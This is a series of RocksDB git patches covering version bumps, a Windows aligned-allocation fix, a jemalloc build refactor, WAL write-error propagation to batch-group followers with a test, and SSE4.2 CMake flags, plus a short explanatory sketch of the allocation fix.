61ca0a1e3fe..dbc01beebed 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -6,7 +6,7 @@ #define ROCKSDB_MAJOR 5 #define ROCKSDB_MINOR 8 -#define ROCKSDB_PATCH 4 +#define ROCKSDB_PATCH 5 // Do not use these. We made the mistake of declaring macros starting with // double underscore. Now we have to live with our choice. We'll deprecate these From aa00523e0e36cead871fcf63282493c28ddce7ab Mon Sep 17 00:00:00 2001 From: Dmitri Smirnov Date: Thu, 31 Aug 2017 16:42:05 -0700 Subject: [PATCH 199/205] Add -DPORTABLE=1 to MSVC CI build Summary: Add -DPORTABLE=1. port::cacheline_aligned_alloc() has its arguments swapped, which prevents every single test from running.
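The swapped call matters because _aligned_malloc's signature is (size, alignment): with the arguments reversed, every request allocates only CACHE_LINE_SIZE bytes, aligned to the requested size. Below is a small sketch of the corrected contract; the posix_memalign branch is an assumed portable fallback added here for non-Windows builds, not part of this patch.

#include <cassert>
#include <cstddef>
#include <cstdint>
#ifdef _MSC_VER
#include <malloc.h>
#else
#include <cstdlib>  // posix_memalign on POSIX systems
#endif

static const size_t kCacheLineSize = 64;

inline void* CacheLineAlignedAlloc(size_t size) {
#ifdef _MSC_VER
  // Correct order: size first, then alignment.
  return _aligned_malloc(size, kCacheLineSize);
#else
  void* p = nullptr;
  return posix_memalign(&p, kCacheLineSize, size) == 0 ? p : nullptr;
#endif
}

inline void CacheLineAlignedFree(void* p) {
#ifdef _MSC_VER
  _aligned_free(p);
#else
  std::free(p);
#endif
}

int main() {
  void* p = CacheLineAlignedAlloc(1024);
  assert(p != nullptr);
  // With the arguments swapped, this alignment check (and any use past
  // byte 64) would be wrong for large requests.
  assert(reinterpret_cast<uintptr_t>(p) % kCacheLineSize == 0);
  CacheLineAlignedFree(p);
  return 0;
}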
Closes https://github.com/facebook/rocksdb/pull/2815 Differential Revision: D5751661 Pulled By: siying fbshipit-source-id: e0857d6e138ec46035b3c23d7c3c751901a0a4a0 --- appveyor.yml | 2 +- cache/lru_cache.cc | 7 ------- port/win/port_win.h | 2 +- 3 files changed, 2 insertions(+), 9 deletions(-) diff --git a/appveyor.yml b/appveyor.yml index f582bb1950a..be9b66b45c9 100644 --- a/appveyor.yml +++ b/appveyor.yml @@ -3,7 +3,7 @@ image: Visual Studio 2015 before_build: - md %APPVEYOR_BUILD_FOLDER%\build - cd %APPVEYOR_BUILD_FOLDER%\build -- cmake -G "Visual Studio 14 2015 Win64" -DOPTDBG=1 -DXPRESS=1 .. +- cmake -G "Visual Studio 14 2015 Win64" -DOPTDBG=1 -DXPRESS=1 -DPORTABLE=1 .. - cd .. build: project: build\rocksdb.sln diff --git a/cache/lru_cache.cc b/cache/lru_cache.cc index 268378b9d2b..d29e7093427 100644 --- a/cache/lru_cache.cc +++ b/cache/lru_cache.cc @@ -465,14 +465,7 @@ LRUCache::LRUCache(size_t capacity, int num_shard_bits, bool strict_capacity_limit, double high_pri_pool_ratio) : ShardedCache(capacity, num_shard_bits, strict_capacity_limit) { num_shards_ = 1 << num_shard_bits; -#if defined(_MSC_VER) -#pragma warning(push) -#pragma warning(disable: 4316) // We've validated the alignment with the new operators -#endif shards_ = new LRUCacheShard[num_shards_]; -#if defined(_MSC_VER) -#pragma warning(pop) -#endif SetCapacity(capacity); SetStrictCapacityLimit(strict_capacity_limit); for (int i = 0; i < num_shards_; i++) { diff --git a/port/win/port_win.h b/port/win/port_win.h index 1ec09068335..408bc63db59 100644 --- a/port/win/port_win.h +++ b/port/win/port_win.h @@ -242,7 +242,7 @@ extern void InitOnce(OnceType* once, void (*initializer)()); inline void *cacheline_aligned_alloc(size_t size) { - return _aligned_malloc(CACHE_LINE_SIZE, size); + return _aligned_malloc(size, CACHE_LINE_SIZE); } inline void cacheline_aligned_free(void *memblock) { From 36074ba5debc82e95a035e136c4218c1f566f03d Mon Sep 17 00:00:00 2001 From: Dmitri Smirnov Date: Fri, 27 Oct 2017 13:14:07 -0700 Subject: [PATCH 200/205] Enable cacheline_aligned_alloc() to allocate from jemalloc if enabled. Summary: Reuse WITH_JEMALLOC option in preparation for module search unification. Move jemalloc overrides into a separate .cc. Remove the obsolete JEMALLOC_NOINIT option. Closes https://github.com/facebook/rocksdb/pull/3078 Differential Revision: D6174826 Pulled By: yiwu-arbug fbshipit-source-id: 9970a0289b4490272d15853920d9d7531af91140 --- CMakeLists.txt | 8 ++++- port/win/port_win.cc | 77 ---------------------------------------- port/win/port_win.h | 18 ++++++++++ port/win/win_jemalloc.cc | 47 ++++++++++++++++++++++++ port/win/xpress_win.cc | 59 +++++------------------------- thirdparty.inc | 27 +++++--------- 6 files changed, 89 insertions(+), 147 deletions(-) create mode 100644 port/win/win_jemalloc.cc diff --git a/CMakeLists.txt b/CMakeLists.txt index 2d99cdf9445..45bb105a2ee 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -41,10 +41,10 @@ endif() list(APPEND CMAKE_MODULE_PATH "${CMAKE_SOURCE_DIR}/cmake/modules/") +option(WITH_JEMALLOC "build with JeMalloc" OFF) if(MSVC) include(${CMAKE_CURRENT_SOURCE_DIR}/thirdparty.inc) else() - option(WITH_JEMALLOC "build with JeMalloc" OFF) if(CMAKE_SYSTEM_NAME MATCHES "FreeBSD") # FreeBSD has jemaloc as default malloc # but it does not have all the jemalloc files in include/...
@@ -574,6 +574,12 @@ if(WIN32) port/win/win_logger.cc port/win/win_thread.cc port/win/xpress_win.cc) + +if(WITH_JEMALLOC) + list(APPEND SOURCES + port/win/win_jemalloc.cc) +endif() + else() list(APPEND SOURCES port/port_posix.cc diff --git a/port/win/port_win.cc b/port/win/port_win.cc index e5d5a44d6c7..b3fccbd9308 100644 --- a/port/win/port_win.cc +++ b/port/win/port_win.cc @@ -228,80 +228,3 @@ int GetMaxOpenFiles() { return -1; } } // namespace port } // namespace rocksdb - -#ifdef JEMALLOC - -#include "jemalloc/jemalloc.h" - -#ifndef JEMALLOC_NON_INIT - -namespace rocksdb { - -namespace port { - -__declspec(noinline) void WINAPI InitializeJemalloc() { - je_init(); - atexit(je_uninit); -} - -} // port -} // rocksdb - -extern "C" { - -#ifdef _WIN64 - -#pragma comment(linker, "/INCLUDE:p_rocksdb_init_jemalloc") - -typedef void(WINAPI* CRT_Startup_Routine)(void); - -// .CRT section is merged with .rdata on x64 so it must be constant data. -// must be of external linkage -// We put this into XCT since we want to run this earlier than C++ static -// constructors -// which are placed into XCU -#pragma const_seg(".CRT$XCT") -extern const CRT_Startup_Routine p_rocksdb_init_jemalloc; -const CRT_Startup_Routine p_rocksdb_init_jemalloc = - rocksdb::port::InitializeJemalloc; -#pragma const_seg() - -#else // _WIN64 - -// x86 untested - -#pragma comment(linker, "/INCLUDE:_p_rocksdb_init_jemalloc") - -#pragma section(".CRT$XCT", read) -JEMALLOC_SECTION(".CRT$XCT") JEMALLOC_ATTR(used) static const void( - WINAPI* p_rocksdb_init_jemalloc)(void) = rocksdb::port::InitializeJemalloc; - -#endif // _WIN64 - -} // extern "C" - -#endif // JEMALLOC_NON_INIT - -// Global operators to be replaced by a linker - -void* operator new(size_t size) { - void* p = je_malloc(size); - if (!p) { - throw std::bad_alloc(); - } - return p; -} - -void* operator new[](size_t size) { - void* p = je_malloc(size); - if (!p) { - throw std::bad_alloc(); - } - return p; -} - -void operator delete(void* p) { je_free(p); } - -void operator delete[](void* p) { je_free(p); } - -#endif // JEMALLOC diff --git a/port/win/port_win.h b/port/win/port_win.h index 408bc63db59..f3c86690515 100644 --- a/port/win/port_win.h +++ b/port/win/port_win.h @@ -240,13 +240,31 @@ extern void InitOnce(OnceType* once, void (*initializer)()); #define CACHE_LINE_SIZE 64U #endif +#ifdef ROCKSDB_JEMALLOC +#include "jemalloc/jemalloc.h" +// Separate inlines so they can be replaced if needed +inline void* jemalloc_aligned_alloc( size_t size, size_t alignment) { + return je_aligned_alloc(alignment, size); +} +inline void jemalloc_aligned_free(void* p) { + je_free(p); +} +#endif inline void *cacheline_aligned_alloc(size_t size) { +#ifdef ROCKSDB_JEMALLOC + return jemalloc_aligned_alloc(size, CACHE_LINE_SIZE); +#else return _aligned_malloc(size, CACHE_LINE_SIZE); +#endif } inline void cacheline_aligned_free(void *memblock) { +#ifdef ROCKSDB_JEMALLOC + jemalloc_aligned_free(memblock); +#else _aligned_free(memblock); +#endif } // https://gcc.gnu.org/bugzilla/show_bug.cgi?id=52991 for MINGW32 diff --git a/port/win/win_jemalloc.cc b/port/win/win_jemalloc.cc new file mode 100644 index 00000000000..fc46e189c4f --- /dev/null +++ b/port/win/win_jemalloc.cc @@ -0,0 +1,47 @@ +// Copyright (c) 2011-present, Facebook, Inc. All rights reserved. +// This source code is licensed under the BSD-style license found in the +// LICENSE file in the root directory of this source tree. An additional grant +// of patent rights can be found in the PATENTS file in the same directory. 
+// +// Copyright (c) 2011 The LevelDB Authors. All rights reserved. +// Use of this source code is governed by a BSD-style license that can be +// found in the LICENSE file. See the AUTHORS file for names of contributors. + +#ifndef ROCKSDB_JEMALLOC +# error This file can only be part of jemalloc aware build +#endif + +#include +#include "jemalloc/jemalloc.h" + +// Global operators to be replaced by a linker when this file is +// a part of the build + +void* operator new(size_t size) { + void* p = je_malloc(size); + if (!p) { + throw std::bad_alloc(); + } + return p; +} + +void* operator new[](size_t size) { + void* p = je_malloc(size); + if (!p) { + throw std::bad_alloc(); + } + return p; +} + +void operator delete(void* p) { + if (p) { + je_free(p); + } +} + +void operator delete[](void* p) { + if (p) { + je_free(p); + } +} + diff --git a/port/win/xpress_win.cc b/port/win/xpress_win.cc index e16ca986491..9ab23c534d9 100644 --- a/port/win/xpress_win.cc +++ b/port/win/xpress_win.cc @@ -17,10 +17,6 @@ #ifdef XPRESS -#ifdef JEMALLOC -#include -#endif - // Put this under ifdef so windows systems w/o this // can still build #include @@ -43,22 +39,6 @@ auto CloseDecompressorFun = [](void* h) { ::CloseDecompressor(reinterpret_cast(h)); } }; - - -#ifdef JEMALLOC -// Make sure compressors use our jemalloc if redirected -PVOID CompressorAlloc(PVOID, SIZE_T size) { - return je_malloc(size); -} - -VOID CompressorFree(PVOID, PVOID p) { - if (p != NULL) { - je_free(p); - } -} - -#endif - } bool Compress(const char* input, size_t length, std::string* output) { @@ -73,17 +53,6 @@ bool Compress(const char* input, size_t length, std::string* output) { COMPRESS_ALLOCATION_ROUTINES* allocRoutinesPtr = nullptr; -#ifdef JEMALLOC - COMPRESS_ALLOCATION_ROUTINES allocationRoutines; - - // Init. allocation routines - allocationRoutines.Allocate = CompressorAlloc; - allocationRoutines.Free = CompressorFree; - allocationRoutines.UserContext = NULL; - - allocRoutinesPtr = &allocationRoutines; -#endif - COMPRESSOR_HANDLE compressor = NULL; BOOL success = CreateCompressor( @@ -94,17 +63,17 @@ bool Compress(const char* input, size_t length, std::string* output) { if (!success) { #ifdef _DEBUG std::cerr << "XPRESS: Failed to create Compressor LastError: " << - GetLastError() << std::endl; + GetLastError() << std::endl; #endif return false; } std::unique_ptr - compressorGuard(compressor, CloseCompressorFun); + compressorGuard(compressor, CloseCompressorFun); SIZE_T compressedBufferSize = 0; - // Query compressed buffer size. + // Query compressed buffer size. success = ::Compress( compressor, // Compressor Handle const_cast(input), // Input buffer @@ -123,8 +92,8 @@ bool Compress(const char* input, size_t length, std::string* output) { "XPRESS: Failed to estimate compressed buffer size LastError " << lastError << std::endl; #endif - return false; - } + return false; + } } assert(compressedBufferSize > 0); @@ -146,7 +115,7 @@ bool Compress(const char* input, size_t length, std::string* output) { if (!success) { #ifdef _DEBUG std::cerr << "XPRESS: Failed to compress LastError " << - GetLastError() << std::endl; + GetLastError() << std::endl; #endif return false; } @@ -169,16 +138,6 @@ char* Decompress(const char* input_data, size_t input_length, COMPRESS_ALLOCATION_ROUTINES* allocRoutinesPtr = nullptr; -#ifdef JEMALLOC - COMPRESS_ALLOCATION_ROUTINES allocationRoutines; - - // Init. 
allocation routines - allocationRoutines.Allocate = CompressorAlloc; - allocationRoutines.Free = CompressorFree; - allocationRoutines.UserContext = NULL; - allocRoutinesPtr = &allocationRoutines; -#endif - DECOMPRESSOR_HANDLE decompressor = NULL; BOOL success = CreateDecompressor( @@ -190,7 +149,7 @@ char* Decompress(const char* input_data, size_t input_length, if (!success) { #ifdef _DEBUG std::cerr << "XPRESS: Failed to create Decompressor LastError " - << GetLastError() << std::endl; + << GetLastError() << std::endl; #endif return nullptr; } @@ -215,8 +174,8 @@ char* Decompress(const char* input_data, size_t input_length, if (lastError != ERROR_INSUFFICIENT_BUFFER) { #ifdef _DEBUG std::cerr - << "XPRESS: Failed to estimate decompressed buffer size LastError " - << lastError << std::endl; + << "XPRESS: Failed to estimate decompressed buffer size LastError " + << lastError << std::endl; #endif return nullptr; } diff --git a/thirdparty.inc b/thirdparty.inc index 9fffd9bff07..a364d1d4480 100644 --- a/thirdparty.inc +++ b/thirdparty.inc @@ -8,8 +8,6 @@ set(USE_SNAPPY_DEFAULT 0) # SNAPPY is disabled by default, enable with -D set(USE_LZ4_DEFAULT 0) # LZ4 is disabled by default, enable with -DLZ4=1 cmake command line agrument set(USE_ZLIB_DEFAULT 0) # ZLIB is disabled by default, enable with -DZLIB=1 cmake command line agrument set(USE_XPRESS_DEFAULT 0) # XPRESS is disabled by default, enable with -DXPRESS=1 cmake command line agrument -set(USE_JEMALLOC_DEFAULT 0) # JEMALLOC is disabled by default, enable with -DJEMALLOC=1 cmake command line agrument -set(USE_JENONINIT_DEFAULT 1) # Default is enabled do not call je_init/je_uninit as the newer versions do not have it disable with -DJENONINIT=0 # # This example assumes all the libraries locate in directories under THIRDPARTY_HOME environment variable @@ -219,15 +217,15 @@ set(JEMALLOC_LIB_RELEASE ${JEMALLOC_HOME}/bin/retail/amd64/jemalloc.lib) # # Don't touch these lines # -if (DEFINED JEMALLOC) - set(USE_JEMALLOC ${JEMALLOC}) -else () - set(USE_JEMALLOC ${USE_JEMALLOC_DEFAULT}) -endif () -if (${USE_JEMALLOC} EQUAL 1) +# For compatibilty with previous +if(JEMALLOC) + set(WITH_JEMALLOC ON) +endif() + +if (WITH_JEMALLOC) message(STATUS "JEMALLOC library is enabled") - set(JEMALLOC_CXX_FLAGS "-DJEMALLOC -DJEMALLOC_EXPORT= ") + set(JEMALLOC_CXX_FLAGS "-DROCKSDB_JEMALLOC -DJEMALLOC_EXPORT= ") if(DEFINED ENV{JEMALLOC_INCLUDE}) set(JEMALLOC_INCLUDE $ENV{JEMALLOC_INCLUDE}) @@ -248,16 +246,7 @@ if (${USE_JEMALLOC} EQUAL 1) set (THIRDPARTY_LIBS ${THIRDPARTY_LIBS} ${JEMALLOC_LIBS}) set (ARTIFACT_SUFFIX "_je") - set(USE_JENONINIT USE_JENONINIT_DEFAULT) - - if(JENONINIT) - set(USE_JENONINIT ${JENONINIT}) - endif() - - if(${USE_JENONINIT} EQUAL 1) - add_definitions(-DJEMALLOC_NON_INIT) - message(STATUS "JEMALLOC NONINIT version") - endif() + set(WITH_JEMALLOC ON) else () set (ARTIFACT_SUFFIX "") From 9e47084ce270861e3c4598bbd15798c440527c59 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Mon, 20 Nov 2017 13:51:43 -0800 Subject: [PATCH 201/205] Bump version to 5.8.6 --- HISTORY.md | 4 ++++ include/rocksdb/version.h | 2 +- 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/HISTORY.md b/HISTORY.md index e62622e081c..9156290e0c1 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,4 +1,8 @@ # Rocksdb Change Log +## 5.8.6 (11/20/2017) +### Bug Fixes +* Fixed aligned_alloc issues with Windows. + ## 5.8.1 (10/23/2017) ### New Features * Add a new db property "rocksdb.estimate-oldest-key-time" to return oldest data timestamp. 
The property is available only for FIFO compaction with compaction_options_fifo.allow_compaction = false. diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index dbc01beebed..b48732d75f2 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -6,7 +6,7 @@ #define ROCKSDB_MAJOR 5 #define ROCKSDB_MINOR 8 -#define ROCKSDB_PATCH 5 +#define ROCKSDB_PATCH 6 // Do not use these. We made the mistake of declaring macros starting with // double underscore. Now we have to live with our choice. We'll deprecate these From 7513f6350539d478fd5c1081a2b8dffabcbb8a08 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 28 Nov 2017 11:40:40 -0800 Subject: [PATCH 202/205] Fix IOError on WAL write doesn't propagate to write group follower Summary: This is a simpler version of #3097 by removing all unrelated changes. Fixing the bug where concurrent writes may get Status::OK while it actually gets IOError on WAL write. This happens when multiple writes form a write batch group, and the leader get an IOError while writing to WAL. The leader failed to pass the error to followers in the group, and the followers end up returning Status::OK() while actually writing nothing. The bug only affect writes in a batch group. Future writes after the batch group will correctly return immediately with the IOError. Closes https://github.com/facebook/rocksdb/pull/3201 Differential Revision: D6421644 Pulled By: yiwu-arbug fbshipit-source-id: 1c2a455c5b73f6842423785eb8a9dbfbb191dc0e --- HISTORY.md | 2 ++ db/db_impl_write.cc | 4 ++-- db/db_write_test.cc | 50 ++++++++++++++++++++++++++++++++++++++++++++- db/write_thread.cc | 5 +++++ 4 files changed, 58 insertions(+), 3 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 9156290e0c1..1d9a666be87 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,4 +1,6 @@ # Rocksdb Change Log +* Fix IOError on WAL write doesn't propagate to write group follower + ## 5.8.6 (11/20/2017) ### Bug Fixes * Fixed aligned_alloc issues with Windows. diff --git a/db/db_impl_write.cc b/db/db_impl_write.cc index 8a11948f7e3..2b06c7d710c 100644 --- a/db/db_impl_write.cc +++ b/db/db_impl_write.cc @@ -319,7 +319,7 @@ Status DBImpl::WriteImpl(const WriteOptions& write_options, versions_->SetLastSequence(last_sequence); } MemTableInsertStatusCheck(w.status); - write_thread_.ExitAsBatchGroupLeader(write_group, w.status); + write_thread_.ExitAsBatchGroupLeader(write_group, status); } if (status.ok()) { @@ -543,7 +543,7 @@ Status DBImpl::WriteImplWALOnly(const WriteOptions& write_options, if (!w.CallbackFailed()) { WriteCallbackStatusCheck(status); } - nonmem_write_thread_.ExitAsBatchGroupLeader(write_group, w.status); + nonmem_write_thread_.ExitAsBatchGroupLeader(write_group, status); if (status.ok()) { status = w.FinalStatus(); } diff --git a/db/db_write_test.cc b/db/db_write_test.cc index 726f444fa16..e3e8ad829d7 100644 --- a/db/db_write_test.cc +++ b/db/db_write_test.cc @@ -3,12 +3,17 @@ // COPYING file in the root directory) and Apache 2.0 License // (found in the LICENSE.Apache file in the root directory). 
+#include #include #include #include #include "db/db_test_util.h" #include "db/write_batch_internal.h" +#include "db/write_thread.h" +#include "port/port.h" #include "port/stack_trace.h" +#include "util/fault_injection_test_env.h" +#include "util/string_util.h" #include "util/sync_point.h" namespace rocksdb { @@ -18,7 +23,9 @@ class DBWriteTest : public DBTestBase, public testing::WithParamInterface { public: DBWriteTest() : DBTestBase("/db_write_test") {} - void Open() { DBTestBase::Reopen(GetOptions(GetParam())); } + Options GetOptions() { return DBTestBase::GetOptions(GetParam()); } + + void Open() { DBTestBase::Reopen(GetOptions()); } }; // Sequence number should be return through input write batch. @@ -67,6 +74,47 @@ TEST_P(DBWriteTest, ReturnSeuqneceNumberMultiThreaded) { } } +TEST_P(DBWriteTest, IOErrorOnWALWritePropagateToWriteThreadFollower) { + constexpr int kNumThreads = 5; + std::unique_ptr mock_env( + new FaultInjectionTestEnv(Env::Default())); + Options options = GetOptions(); + options.env = mock_env.get(); + Reopen(options); + std::atomic ready_count{0}; + std::atomic leader_count{0}; + std::vector threads; + mock_env->SetFilesystemActive(false); + // Wait until all threads linked to write threads, to make sure + // all threads join the same batch group. + SyncPoint::GetInstance()->SetCallBack( + "WriteThread::JoinBatchGroup:Wait", [&](void* arg) { + ready_count++; + auto* w = reinterpret_cast(arg); + if (w->state == WriteThread::STATE_GROUP_LEADER) { + leader_count++; + while (ready_count < kNumThreads) { + // busy waiting + } + } + }); + SyncPoint::GetInstance()->EnableProcessing(); + for (int i = 0; i < kNumThreads; i++) { + threads.push_back(port::Thread( + [&](int index) { + // All threads should fail. + ASSERT_FALSE(Put("key" + ToString(index), "value").ok()); + }, + i)); + } + for (int i = 0; i < kNumThreads; i++) { + threads[i].join(); + } + ASSERT_EQ(1, leader_count); + // Close before mock_env destruct. + Close(); +} + INSTANTIATE_TEST_CASE_P(DBWriteTestInstance, DBWriteTest, testing::Values(DBTestBase::kDefault, DBTestBase::kConcurrentWALWrites, diff --git a/db/write_thread.cc b/db/write_thread.cc index 2d3b34602cc..afe2f27978e 100644 --- a/db/write_thread.cc +++ b/db/write_thread.cc @@ -532,6 +532,11 @@ void WriteThread::ExitAsBatchGroupLeader(WriteGroup& write_group, Writer* last_writer = write_group.last_writer; assert(leader->link_older == nullptr); + // Propagate memtable write error to the whole group. + if (status.ok() && !write_group.status.ok()) { + status = write_group.status; + } + if (enable_pipelined_write_) { // Notify writers don't write to memtable to exit. for (Writer* w = last_writer; w != leader;) { From a0cdc3ceccf7b1edcfbec7f9b447e58d4ea82af5 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Tue, 28 Nov 2017 12:34:06 -0800 Subject: [PATCH 203/205] Bump version to 5.8.7 --- HISTORY.md | 2 ++ include/rocksdb/version.h | 2 +- 2 files changed, 3 insertions(+), 1 deletion(-) diff --git a/HISTORY.md b/HISTORY.md index 1d9a666be87..54fa8b87043 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -1,4 +1,6 @@ # Rocksdb Change Log +## 5.8.6 (11/28/2017) +### Bug Fixes * Fix IOError on WAL write doesn't propagate to write group follower ## 5.8.6 (11/20/2017) diff --git a/include/rocksdb/version.h b/include/rocksdb/version.h index b48732d75f2..d592e6dae39 100644 --- a/include/rocksdb/version.h +++ b/include/rocksdb/version.h @@ -6,7 +6,7 @@ #define ROCKSDB_MAJOR 5 #define ROCKSDB_MINOR 8 -#define ROCKSDB_PATCH 6 +#define ROCKSDB_PATCH 7 // Do not use these. 
We made the mistake of declaring macros starting with // double underscore. Now we have to live with our choice. We'll deprecate these From b8655d952df1c524e664eda39de7039a2420cd58 Mon Sep 17 00:00:00 2001 From: Kefu Chai Date: Wed, 11 Oct 2017 12:14:53 -0700 Subject: [PATCH 205/205] cmake: pass "-msse4.2" when building crc32c.cc if HAVE_SSE42 Summary: It turns out that, with the older GCC shipped with CentOS 7, the SSE4.2 intrinsics are not available even with "target" specified, so we need to pass "-msse4.2" both for checking the compiler's SSE4.2 support and for building crc32c.cc, which uses SSE4.2 intrinsics for crc32. Signed-off-by: Kefu Chai Closes https://github.com/facebook/rocksdb/pull/2950 Differential Revision: D6032298 Pulled By: siying fbshipit-source-id: 124c946321043661b3fb0a70b6cdf4c9c5126ab4 --- CMakeLists.txt | 11 ++++++++++- 1 file changed, 10 insertions(+), 1 deletion(-) diff --git a/CMakeLists.txt b/CMakeLists.txt index 45bb105a2ee..404e14a87f0 100644 --- a/CMakeLists.txt +++ b/CMakeLists.txt @@ -189,8 +189,10 @@ else() endif() endif() -set(CMAKE_REQUIRED_FLAGS ${CMAKE_CXX_FLAGS}) include(CheckCXXSourceCompiles) +if(NOT MSVC) + set(CMAKE_REQUIRED_FLAGS "-msse4.2") +endif() CHECK_CXX_SOURCE_COMPILES(" #include <cstdint> #include <nmmintrin.h> int main() { volatile uint32_t x = _mm_crc32_u32(0, 0); } " HAVE_SSE42) +unset(CMAKE_REQUIRED_FLAGS) if(HAVE_SSE42) add_definitions(-DHAVE_SSE42) elseif(FORCE_SSE42) @@ -565,6 +568,12 @@ set(SOURCES utilities/write_batch_with_index/write_batch_with_index_internal.cc $<TARGET_OBJECTS:build_version>) +if(HAVE_SSE42 AND NOT FORCE_SSE42) +set_source_files_properties( + util/crc32c.cc + PROPERTIES COMPILE_FLAGS "-msse4.2") +endif() + if(WIN32) list(APPEND SOURCES port/win/io_win.cc
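For reference, the CHECK_CXX_SOURCE_COMPILES probe above can be reproduced as a standalone translation unit: it only builds when the compiler both declares the SSE4.2 intrinsics and is allowed to emit them, which on older GCC (such as the CentOS 7 toolchain) requires compiling with -msse4.2, exactly the flag the CMake change supplies. A minimal sketch, built with, e.g., g++ -msse4.2 sse42_probe.cc:

#include <cstdint>
#include <nmmintrin.h>  // SSE4.2 intrinsics, including _mm_crc32_u32

int main() {
  // Computes one CRC32 step; this line fails to compile (or link) unless
  // SSE4.2 support is enabled on the command line.
  volatile uint32_t x = _mm_crc32_u32(0, 0);
  (void)x;
  return 0;
}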